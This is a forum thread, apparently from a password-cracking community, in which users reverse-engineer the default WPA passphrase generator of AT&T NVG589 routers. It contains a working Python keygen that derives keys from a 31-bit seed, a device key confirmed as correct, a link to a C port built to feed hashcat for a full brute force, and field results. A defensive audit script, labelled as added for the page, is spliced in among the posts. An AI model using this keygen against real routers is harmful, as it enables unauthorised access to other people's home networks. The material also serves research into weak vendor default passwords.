Keyspace List for WPA on Default Routers

soxrok2212 | Member | Posts: 182 | Threads: 4 | Joined: Jul 2015
07-07-2017, 01:29 AM (This post was last modified: 07-07-2017, 01:30 AM by soxrok2212.)

(07-06-2017, 10:50 PM)fart-box Wrote:
I agree about the 'l'. It seems to be too seldom used. I've been trying to convert those magic numbers your code generates into some form of seed to build a proper pass phrase but I've had no luck. I wonder how soxrok2212 is doing with his firmware extraction...?

I got caught up in work, sorry. I was also trying to figure out which of the two possible points of interest may be UART, but I ran out of time. I don't have a day off until next week, but I'll try to figure it out in any spare time.

mrfancypants | Junior Member | Posts: 37 | Threads: 3 | Joined: Apr 2017
07-09-2017, 10:40 AM (This post was last modified: 07-09-2017, 10:44 AM by mrfancypants.)

Alpha version of the keygen for NVG589:

Code:
pw_charset = 'abcdefghijkmnpqrstuvwxyz23456789#%+=?'

def pwgen589(x):
    # scale the 31-bit seed by the magic float constant; int() truncates
    x = int(x * 465661287.5245797)
    pw = ''
    for n in range(0, 6):
        pw = pw_charset[x % 37] + pw   # one symbol from the 37-character charset
        x //= 37                        # integer division (what '/' did in Python 2)
        pw = chr(50 + (x % 8)) + pw     # one digit in the range '2'..'9'
        x //= 37
    return pw

Example: (attachment 589.jpg, 52.29 KB)

Code:
>>> pwgen589(0x57c5d9ab)
'596p7=6y6r2a'

As before, 'x' is an integer from 0 to 0x7FFFFFFF (2 billion options). I'm not yet clear how (or if) 'x' relates to other device attributes.

This only works about 70% of the time because of the rounding during the float multiplication step. The magic number is approximately equal to 1e18/2^31 + 111/2^9 + 2923/2^25 (not certain about the last term.) Depending on the order of operations, sometimes the result ends up slightly off.

soxrok2212 | Member | Posts: 182 | Threads: 4 | Joined: Jul 2015
07-09-2017, 09:33 PM

(07-09-2017, 10:40 AM)mrfancypants Wrote:
Alpha version of the keygen for NVG589:

Code:
pw_charset = 'abcdefghijkmnpqrstuvwxyz23456789#%+=?'

def pwgen589(x):
    # scale the 31-bit seed by the magic float constant; int() truncates
    x = int(x * 465661287.5245797)
    pw = ''
    for n in range(0, 6):
        pw = pw_charset[x % 37] + pw   # one symbol from the 37-character charset
        x //= 37                        # integer division (what '/' did in Python 2)
        pw = chr(50 + (x % 8)) + pw     # one digit in the range '2'..'9'
        x //= 37
    return pw

Example:

Code:
>>> pwgen589(0x57c5d9ab)
'596p7=6y6r2a'

As before, 'x' is an integer from 0 to 0x7FFFFFFF (2 billion options). I'm not yet clear how (or if) 'x' relates to other device attributes.

This only works about 70% of the time because of the rounding during the float multiplication step. The magic number is approximately equal to 1e18/2^31 + 111/2^9 + 2923/2^25 (not certain about the last term.) Depending on the order of operations, sometimes the result ends up slightly off.

I will modify this code a bit and see if a friend of mine can use his 2.6MH/s and see if it works on my 589.

mrfancypants | Junior Member | Posts: 37 | Threads: 3 | Joined: Apr 2017
07-10-2017, 12:07 AM

Give me the first 8 letters of the key from your 589.

soxrok2212 | Member | Posts: 182 | Threads: 4 | Joined: Jul 2015
07-10-2017, 02:15 AM

b=+#gc5q

mrfancypants | Junior Member | Posts: 37 | Threads: 3 | Joined: Apr 2017
07-10-2017, 02:37 AM (This post was last modified: 07-10-2017, 02:59 AM by mrfancypants.)

That's a 599-type password (my previous code snippet) (some 589s have these) and the complete password should be b=+#gc5qr9gt
https://repl.it/JMbi/4

soxrok2212 | Member | Posts: 182 | Threads: 4 | Joined: Jul 2015
07-10-2017, 11:36 AM (This post was last modified: 07-10-2017, 04:22 PM by soxrok2212.)

(07-10-2017, 02:37 AM)mrfancypants Wrote:
That's a 599-type password (my previous code snippet) (some 589s have these) and the complete password should be b=+#gc5qr9gt
https://repl.it/JMbi/4

You are correct sir! Fantastic work! I know absolutely no C, but from my understanding, if there are only 2.1 billion possibilities, then a full bruteforce is possible. I know a few people who could help me write this in C in order to pipe faster, but it may take some time.
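An added audit helper, written for this page and not code from the thread or from the PSKracker project: it assumes only what the pwgen589 snippet above shows (the 37-symbol charset, the digit/charset alternation over six pairs, and a 31-bit seed) and uses that to flag a passphrase that still has the NVG589 default shape. The point for a defender is the gap between the ~49 bits such a 12-character key appears to carry and the 31 bits of seed behind it. A key that fails the shape check is not necessarily safe (the 599-type key quoted above has a different structure that this helper does not model); the sample inputs are constructed from the two keys quoted in the thread plus one user-chosen passphrase.

```python
import math

# Assumptions taken from the pwgen589 snippet in the thread.
PW_CHARSET = 'abcdefghijkmnpqrstuvwxyz23456789#%+=?'  # 37 symbols, no 'l' or 'o'
DIGITS = '23456789'                                   # chr(50 + x % 8)
SEED_BITS = 31                                        # x in 0 .. 0x7FFFFFFF


def matches_nvg589_shape(pw):
    """True if pw is 12 chars alternating digit '2'..'9' / charset symbol."""
    if len(pw) != 12:
        return False
    return all(
        (c in DIGITS) if i % 2 == 0 else (c in PW_CHARSET)
        for i, c in enumerate(pw)
    )


def apparent_keyspace_bits():
    """Entropy a key of this shape appears to have: 8^6 * 37^6 combinations."""
    return 6 * math.log2(len(DIGITS)) + 6 * math.log2(len(PW_CHARSET))


def audit(pw):
    """Summarise one passphrase: does it look like a default, and how big
    is the space an attacker would really have to search?"""
    shaped = matches_nvg589_shape(pw)
    return {
        'matches_default_shape': shaped,
        'apparent_bits': round(apparent_keyspace_bits(), 1),
        # effective entropy collapses to the seed size when the shape matches
        'effective_bits': SEED_BITS if shaped else None,
    }


# Constructed samples: two keys quoted in the thread and one user-chosen key.
SAMPLES = {
    '596p7=6y6r2a': 'NVG589 default shape (from pwgen589 example)',
    'b=+#gc5qr9gt': '599-type shape, not modelled here',
    'MyHomeNetwork2017!': 'user-chosen passphrase',
}

if __name__ == '__main__':
    for pw, label in SAMPLES.items():
        print(f'{pw!r:22} {label:46} {audit(pw)}')
```

Running the block prints one line per sample; the first sample is flagged with an effective size of 31 bits, the other two are not flagged. The shape check is deliberately conservative: it tells an owner that a key is worth replacing, not that a key is strong.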
soxrok2212 | Member | Posts: 182 | Threads: 4 | Joined: Jul 2015
07-11-2017, 05:38 PM

I have written the NVG589 code in C with help from a friend. I have not tested performance with hashcat yet, but you should be able to pipe directly in.
https://github.com/soxrok2212/PSKracker/...ster/att.c

devilsadvocate | Member | Posts: 97 | Threads: 32 | Joined: Aug 2014
07-12-2017, 02:52 AM

Initial tests are interesting. Between a combination of some pictures I had archived of NVG589's and some listings that can be seen on eBay, I tested a total of 7 devices. In every case, I could see what the default wifi password was in a picture of the back of the unit. Of the 7 I tested, the results were the following:

4 - password correctly calculated
2 - password almost correctly calculated
1 - not even close

Regarding the 2 that were almost correctly calculated, the passphrase, with the exception of the last 2 characters, was guessed correctly, but the last 2 characters were wrong. A workaround is to come up with a rule that can truncate the last 2 characters and brute force positions 11 and 12. Either that or adjust the code as necessary.

But this is remarkable. Good work. Cheers.

soxrok2212 | Member | Posts: 182 | Threads: 4 | Joined: Jul 2015
07-12-2017, 03:54 AM

Did you test the python or C code?